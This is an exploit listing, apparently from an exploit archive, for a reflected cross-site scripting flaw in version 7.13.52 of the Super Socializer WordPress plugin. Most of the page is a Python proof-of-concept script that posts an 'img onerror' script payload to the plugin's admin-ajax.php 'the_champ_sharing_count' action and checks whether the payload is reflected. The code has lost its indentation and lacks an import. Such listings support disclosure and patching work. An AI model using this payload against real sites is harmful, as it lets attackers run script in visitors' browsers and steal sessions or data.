Super socializer 7.13.52 reflected xss Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-06-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Super socializer 7.13.52 reflected xss is for educational purposes only and if it is used you will do on your own risk!
# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"
# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"
# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}
# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)
# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
print("Vulnerability successfully exploited")
else:
print("Vulnerability not exploitable")